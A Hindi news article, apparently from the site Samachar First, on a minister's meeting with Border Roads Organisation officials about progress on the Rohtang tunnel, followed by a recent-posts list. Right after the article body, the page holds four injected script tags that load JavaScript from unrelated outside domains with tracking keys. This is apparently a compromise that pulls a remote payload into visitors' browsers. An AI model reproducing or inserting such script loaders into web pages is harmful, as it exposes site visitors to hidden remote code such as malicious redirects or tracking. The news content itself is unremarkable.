Categories: हिमाचल

डॉ मारंकडा ने BRO के अधिकारियों से की बैठक, रोहतांग टनल की प्रगति बारे जानकारी की हासिल

<p>कृषि, सूचना प्रौद्योगिकी और जनजातीय विकास मंत्री डॉ. रामलाल मारकंडा ने वीरवार को मनाली के निकट धुंधी स्थित सीमा सड़क संगठन के परिसर में अधिकारियों के साथ बैठक की और निर्माणाधीन रोहतांग टनल की प्रगति की जानकारी हासिल की। उन्होंने टनल के भीतर शून्य से भी काफी कम तापमान में निर्माण कार्य लगातार जारी रखने के लिए बीआरओ की सराहना की।</p>

<p>डॉ. मारकंडा ने कहा कि पिछले दिनों लगातार बर्फबारी के चलते सोलंगनाला से टनल के दक्षिणी छोर तक सड़क को यातायात के लिए बहाल रखना अपने आप में बड़ी चुनौती है, लेकिन तमाम विषम परिस्थितियों के बावजूद सीमा सड़क संगठन अधिकारियों, कर्मचारियों और कामगारों ने कार्य में व्यवधान नहीं आने दिया।</p>

<p>&nbsp;कृषि मंत्री ने आशा व्यक्त की कि अटल टनल का निर्माण प्रधानमंत्री नरेंद्र मोदी द्वारा निर्धारित समय सीमा के भीतर पूरा कर लिया जाएगा। यह सुरंग जनजातीय जिला लाहौल-स्पिति के अलावा पांगी तथा लेह-लद्दाख के लिए साल भर कनेक्टिविटी प्रदान करेगी। डॉ. मारकंडा ने कहा कि सीमा सड़क संगठन लाहौल और पांगी से आने-जाने वाले लोगों को आपाताकालीन परिस्थितियों में टनल से आवाजाही की सुविधा प्रदान कर रहा है। इसके लिए उन्होंने सीमा सड़क संगठन के अधिकारियों का आभार व्यक्त किया। बैठक में बीआरओ के प्रमुख अभियंता ब्रिगेडियर केपी पुरुषोथमनन, कर्नल विनोद सहित बीआरओ के अन्य अधिकारी तथा मनाली के एसडीएम भी उपस्थित थे। इसके बाद डॉ. मारकंडा ने मनाली और कुल्लू में लोगों की समस्याएं सुनीं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1581588778309″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

अमेरिका की ध्रुवी पटेल के सिर सजा Miss India Worldwide का ताज

समाचार फर्स्‍ट एजेंसी Washington: अमेरिका में ‘कम्प्यूटर इन्फॉर्मेशन सिस्टम’ की छात्रा ध्रुवी पटेल को ‘मिस…

7 hours ago

27 या 28 सितंबर को इंदिरा एकादशी कब है? जानें

  Indira Ekadashi 2024 : हिंदू धर्म में आश्विन मास की पहली एकादशी व्रत का…

7 hours ago

दोपहर 12 बजे हिमाचल मंत्रिमंडल की बैठक: क्या होंगे प्रमुख निर्णय?

  Shimla:  राज्य मंत्रिमंडल की बैठक शुक्रवार दोपहर 12 बजे मुख्यमंत्री सुखविंदर सिंह सुक्खू की…

7 hours ago

आज का ज्योतिषीय प्रभाव

आज का राशिफल 20 सितम्बर 2024, शुक्रवार मेष🐐 (चू, चे, चो, ला, ली, लू, ले,…

7 hours ago

लेह-दिल्ली रूट पर एचआरटीसी की बस सेवा बंद, जून 2025 तक बहाल होगा रूट

  अब यात्रियों को मनाली-केलांग-लेह के बीच टैक्सियों में मंहगा सफर करना पड़ेगा Shimla :एचआरटीसी…

21 hours ago

चिकन की दुकानों में स्वच्छता के नियम दरकिनार

  Hamirpur:जिला खाद्य सुरक्षा विभाग द्वारा किए गए चिकन की दुकानों के निरीक्षण में स्वच्छता…

22 hours ago